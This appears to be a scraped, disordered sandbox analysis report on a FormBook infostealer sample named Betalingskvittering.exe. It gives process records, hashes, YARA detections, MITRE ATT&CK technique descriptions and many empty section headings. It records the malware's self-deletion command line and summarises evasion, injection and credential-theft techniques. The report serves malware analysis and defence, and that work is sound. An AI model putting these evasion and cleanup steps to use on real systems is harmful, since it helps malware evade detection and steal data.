Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: cmd.exe PID: 6836 Parent PID: 3440

General

Start time:	17:49:57
Start date:	27/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: cmd.exe PID: 6928 Parent PID: 6836

General

Start time:	17:50:02
Start date:	27/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\Betalingskvittering.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6956 Parent PID: 6928

General

Start time:	17:50:03
Start date:	27/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Betalingskvittering.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre